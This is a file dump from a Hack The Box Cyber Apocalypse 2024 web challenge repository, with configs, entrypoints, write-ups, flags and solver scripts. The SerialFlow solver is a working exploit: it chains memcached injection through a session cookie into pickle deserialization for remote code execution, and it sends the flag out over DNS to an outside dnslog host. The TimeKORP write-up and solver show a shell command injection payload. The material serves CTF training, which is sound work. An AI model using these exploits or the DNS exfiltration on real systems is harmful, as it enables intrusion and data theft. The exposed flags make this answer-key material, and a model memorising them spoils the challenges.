https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Medium] SerialFlow/assets/overview.png -------------------------------------------------------------------------------- /web/[Medium] SerialFlow/assets/purple.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Medium] SerialFlow/assets/purple.png -------------------------------------------------------------------------------- /web/[Medium] SerialFlow/conf/supervisord.conf: -------------------------------------------------------------------------------- 1 | [supervisord] 2 | user=root 3 | nodaemon=true 4 | logfile=/dev/null 5 | logfile_maxbytes=0 6 | pidfile=/run/supervisord.pid 7 | 8 | [program:flask] 9 | command=python /app/run.py 10 | user=root 11 | autorestart=true 12 | stdout_logfile=/dev/stdout 13 | stdout_logfile_maxbytes=0 14 | stderr_logfile=/dev/stderr 15 | stderr_logfile_maxbytes=0 16 | 17 | [program:memcached] 18 | command=memcached -u memcache -m 64 19 | user=memcached 20 | autorestart=true 21 | stdout_logfile=/dev/stdout 22 | stdout_logfile_maxbytes=0 23 | stderr_logfile=/dev/stderr 24 | stderr_logfile_maxbytes=0 -------------------------------------------------------------------------------- /web/[Medium] SerialFlow/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | # Secure entrypoint 4 | chmod 600 /entrypoint.sh 5 | 6 | # Change flag name 7 | mv /flag.txt /flag$(cat /dev/urandom | tr -cd "a-f0-9" | head -c 10).txt 8 | 9 | /usr/bin/supervisord -c /etc/supervisord.conf -------------------------------------------------------------------------------- /web/[Medium] SerialFlow/htb/solver.py: -------------------------------------------------------------------------------- 1 | import pickle, os, requests, time 2 | 3 | HOST, PORT = "94.237.53.58", 53780 4 | CHALLENGE_URL = f"http://{HOST}:{PORT}" 5 | DNS_EXFIL = "476bdo.dnslog.cn" 6 | 7 | class RCE: 8 | def __init__(self, char): 9 | self.char = char 10 | 11 | def __reduce__(self): 12 | cmd = (f"echo -n '{self.char}'>>a") 13 | 14 | return os.system, (cmd,) 15 | 16 | 17 | class TriggerRCE: 18 | def __reduce__(self): 19 | cmd = (f"sh a") 20 | return os.system, (cmd,) 21 | 22 | 23 | def generate_rce(char, trigger=False): 24 | payload = pickle.dumps(RCE(char), 0) 25 | if trigger: payload = pickle.dumps(TriggerRCE(), 0) 26 | payload_size = len(payload) 27 | cookie = b"1\r\nset injected 0 5 " 28 | cookie += str.encode(str(payload_size)) 29 | cookie += str.encode("\r\n") 30 | cookie += payload 31 | cookie += str.encode("\r\n") 32 | cookie += str.encode("get injected") 33 | 34 | pack = "" 35 | for x in list(cookie): 36 | if x > 64: 37 | pack += oct(x).replace("0o", "\\") 38 | elif x < 8: 39 | pack += oct(x).replace("0o", "\\00") 40 | else: 41 | pack += oct(x).replace("0o", "\\0") 42 | 43 | return f"\"{pack}\"" 44 | 45 | 46 | def generate_exploit(cmd): 47 | cmd = " ".join(cmd) + " " 48 | payload_list = [] 49 | for char in cmd: 50 | if char == "\n": 51 | payload_list.append(generate_rce(char, newline=True)) 52 | else: 53 | payload_list.append(generate_rce(char)) 54 | 55 | return payload_list 56 | 57 | 58 | def pwn(): 59 | payload_file = f"nslookup $(cat /flag*).{DNS_EXFIL}" 60 | exploit = generate_exploit(payload_file) 61 | for char_payload in exploit: 62 | while True: 63 | time.sleep(1) 64 | try: 65 | resp = requests.get(f"{CHALLENGE_URL}/set", cookies={"session": char_payload}) 66 | if resp.status_code != 500 or resp.status_code != 200: 67 | break 68 | else: 69 | requests.get(f"{CHALLENGE_URL}/") 70 | continue 71 | except: 72 | continue 73 | 74 | trigger = generate_rce("", trigger=True) 75 | while True: 76 | time.sleep(1) 77 | try: 78 | resp = requests.get(f"{CHALLENGE_URL}/set", cookies={"session": trigger}) 79 | if resp.status_code != 302 or resp.status_code != 200: 80 | break 81 | else: 82 | requests.get(f"{CHALLENGE_URL}/") 83 | continue 84 | except: 85 | continue 86 | 87 | 88 | def main(): 89 | pwn() 90 | 91 | 92 | if __name__ == "__main__": 93 | main() -------------------------------------------------------------------------------- /web/[Very Easy] Flag Command/assets/dev.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Very Easy] Flag Command/assets/dev.png -------------------------------------------------------------------------------- /web/[Very Easy] Flag Command/assets/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Very Easy] Flag Command/assets/flag.png -------------------------------------------------------------------------------- /web/[Very Easy] Flag Command/assets/home.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Very Easy] Flag Command/assets/home.png -------------------------------------------------------------------------------- /web/[Very Easy] Flag Command/assets/res.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Very Easy] Flag Command/assets/res.png -------------------------------------------------------------------------------- /web/[Very Easy] Flag Command/htb/solver.py: -------------------------------------------------------------------------------- 1 | import requests, re, sys, datetime, hashlib 2 | 3 | hostURL = f'http://127.0.0.1:1337' 4 | 5 | session = requests.session() 6 | 7 | def getFlag(): 8 | jData = { 9 | 'command': 'Blip-blop, in a pickle with a hiccup! Shmiggity-shmack' 10 | } 11 | 12 | req_stat = session.post(f'{hostURL}/api/monitor', json=jData) 13 | flag = re.findall(r'(HTB\{.*?\})', req_stat.text) 14 | print(f'[*] Flag: {flag[0]}') 15 | 16 | print('[*] Gettingg Flag') 17 | getFlag() -------------------------------------------------------------------------------- /web/[Very Easy] Flag Command/official_writeup.md: -------------------------------------------------------------------------------- 1 | ![](https://raw.githubusercontent.com/hackthebox/writeup-templates/master/challenge/assets/images/banner.png) 2 | 3 | 4 | 5 | Flag Command 6 | 7 | ​ Prepared By: Xclow3n 8 | 9 | ​ Challenge Author(s): Xclow3n 10 | 11 | ​ Difficulty: Very Easy 12 | 13 | ​ Classification: Official 14 | 15 | 16 | ### Description: 17 | 18 | Embark on the "Dimensional Escape Quest" where you wake up in a mysterious forest maze that's not quite of this world. Navigate singing squirrels, mischievous nymphs, and grumpy wizards in a whimsical labyrinth that may lead to otherworldly surprises. Will you conquer the enchanted maze or find yourself lost in a different dimension of magical challenges? The journey unfolds in this mystical escape! 19 | 20 | ### Objective 21 | 22 | Find a secret command in json response and use it to get the flag 23 | 24 | ## Application Overview 25 | 26 | Visiting the home page we are provided with the following page: 27 | 28 | ![img](assets/home.png) 29 | 30 | We can play the game but none of the option leads us to the flag 31 | 32 | ## Solution 33 | 34 | If we simply look at the developer's tool network tab and reload the page, we can see it makes a web request to the `options` endpoint 35 | 36 | ![img](assets/dev.png) 37 | 38 | Looking at the response of this endpoint. There is a secret command whose value is "Blip-blop, in a pickle with a hiccup! Shmiggity-shmack". 39 | 40 | ![img](assets/res.png) 41 | 42 | If we start the game and enter the secret value we get the flag. 43 | 44 | ![img](assets/flag.png) -------------------------------------------------------------------------------- /web/[Very Easy] KORP Terminal/.gitignore: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Very Easy] KORP Terminal/.gitignore -------------------------------------------------------------------------------- /web/[Very Easy] KORP Terminal/assets/dump.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Very Easy] KORP Terminal/assets/dump.png -------------------------------------------------------------------------------- /web/[Very Easy] KORP Terminal/assets/overview.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Very Easy] KORP Terminal/assets/overview.png -------------------------------------------------------------------------------- /web/[Very Easy] KORP Terminal/assets/sqlmap.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Very Easy] KORP Terminal/assets/sqlmap.png -------------------------------------------------------------------------------- /web/[Very Easy] KORP Terminal/conf/supervisord.conf: -------------------------------------------------------------------------------- 1 | [supervisord] 2 | user=root 3 | nodaemon=true 4 | logfile=/dev/null 5 | logfile_maxbytes=0 6 | pidfile=/run/supervisord.pid 7 | 8 | [program:flask] 9 | command=python /app/run.py 10 | user=root 11 | autorestart=true 12 | stdout_logfile=/dev/stdout 13 | stdout_logfile_maxbytes=0 14 | stderr_logfile=/dev/stderr 15 | stderr_logfile_maxbytes=0 -------------------------------------------------------------------------------- /web/[Very Easy] KORP Terminal/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | # Secure entrypoint 4 | chmod 600 /entrypoint.sh 5 | 6 | # Random password function 7 | function genPass() { 8 | echo -n $RANDOM | md5sum | head -c 32 9 | } 10 | 11 | # Set environment variables 12 | export MYSQL_HOST="localhost" 13 | export MYSQL_DATABASE="korp_terminal" 14 | export MYSQL_USER="lean" 15 | export MYSQL_PASSWORD=$(genPass) 16 | 17 | # Initialize & Start MariaDB 18 | mkdir -p /run/mysqld 19 | chown -R mysql:mysql /run/mysqld 20 | mysql_install_db --user=mysql --ldata=/var/lib/mysql 21 | mysqld --user=mysql --console --skip-networking=0 & 22 | 23 | # Wait for mysql to start 24 | while ! mysqladmin ping -h"localhost" --silent; do echo "not up" && sleep .2; done 25 | 26 | # Populate database 27 | mysql -u root << EOF 28 | DROP DATABASE IF EXISTS ${MYSQL_DATABASE}; 29 | CREATE DATABASE ${MYSQL_DATABASE}; 30 | CREATE TABLE ${MYSQL_DATABASE}.users ( 31 | id INTEGER PRIMARY KEY AUTO_INCREMENT, 32 | username varchar(255) NOT NULL UNIQUE, 33 | password varchar(255) NOT NULL 34 | ); 35 | 36 | INSERT INTO ${MYSQL_DATABASE}.users(username, password) VALUES('admin', '\$2b\$12\$OF1QqLVkMFUwJrl1J1YG9u6FdAQZa6ByxFt/CkS/2HW8GA563yiv.'); 37 | 38 | CREATE USER '${MYSQL_USER}'@'${MYSQL_HOST}' IDENTIFIED BY '${MYSQL_PASSWORD}'; 39 | GRANT SELECT ON ${MYSQL_DATABASE}.users TO '${MYSQL_USER}'@'${MYSQL_HOST}'; 40 | 41 | FLUSH PRIVILEGES; 42 | EOF 43 | 44 | /usr/bin/supervisord -c /etc/supervisord.conf -------------------------------------------------------------------------------- /web/[Very Easy] KORP Terminal/htb/solver.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Very Easy] KORP Terminal/htb/solver.py -------------------------------------------------------------------------------- /web/[Very Easy] TimeKORP/README.md: -------------------------------------------------------------------------------- 1 | # TimeKORP 2 | 3 | ### Description: 4 | * Are you ready to unravel the mysteries and expose the truth hidden within Korp's digital domain? Join the challenge and prove your prowess in the world of cybersecurity. Remember, time is money, but in this case, the rewards may be far greater than you imagine. 5 | 6 | ### Objective: 7 | * Command Injection 8 | 9 | ### Difficulty: 10 | * `Very Easy` 11 | 12 | ### Flag: 13 | * `HTB{t1m3_f0r_th3_ult1m4t3_pwn4g3}` 14 | 15 | ### Challenge: 16 | 17 |

18 | 19 |

20 | 21 | # [__⏰ Time Factory__](#time-factory) 22 | 23 | In [`controllers/TimeController.php`](challenge/controllers/TimeController.php), we see that the the application expects input through `$_GET`'s `format` value. If there isn't one it default to `'%H:%M:%S'` and then passes it to `TimeModel` and displays the invoked `getTime()` method to the view. 24 | ```javascript 25 | view('index', ['time' => $time->getTime()]); 33 | } 34 | } 35 | ``` 36 | 37 | In [`models/TimeModel.php`](challenge/models/), the function argument then constructs a variable called `command` which is later going to be passed to `exec`. Using the `format` GET parameter, we can escape the context of the `date` command and utilise command injection in order to get RCE. 38 | 39 | ```php 40 | command = "date '+" . $format . "' 2>&1"; 46 | } 47 | 48 | public function getTime() 49 | { 50 | $time = exec($this->command); 51 | $res = isset($time) ? $time : '?'; 52 | return $res; 53 | } 54 | } 55 | ``` 56 | 57 | ### Solver: 58 | ```python 59 | import requests 60 | 61 | host, port = 'localhost', 1337 62 | HOST = 'http://%s:%s/' % (host, port) 63 | 64 | r = requests.get(HOST, params={ 'format': "'; cat /flag || '" }) 65 | print(r.text) 66 | ``` 67 | -------------------------------------------------------------------------------- /web/[Very Easy] TimeKORP/assets/preview.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Very Easy] TimeKORP/assets/preview.png -------------------------------------------------------------------------------- /web/[Very Easy] TimeKORP/flag: -------------------------------------------------------------------------------- 1 | HTB{t1m3_f0r_th3_ult1m4t3_pwn4g3} -------------------------------------------------------------------------------- /web/[Very Easy] TimeKORP/htb/solver.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | host, port = 'localhost', 1337 4 | HOST = 'http://%s:%s/' % (host, port) 5 | 6 | r = requests.get(HOST, params={ 'format': "'; cat /flag || '" }) 7 | print(r.text) --------------------------------------------------------------------------------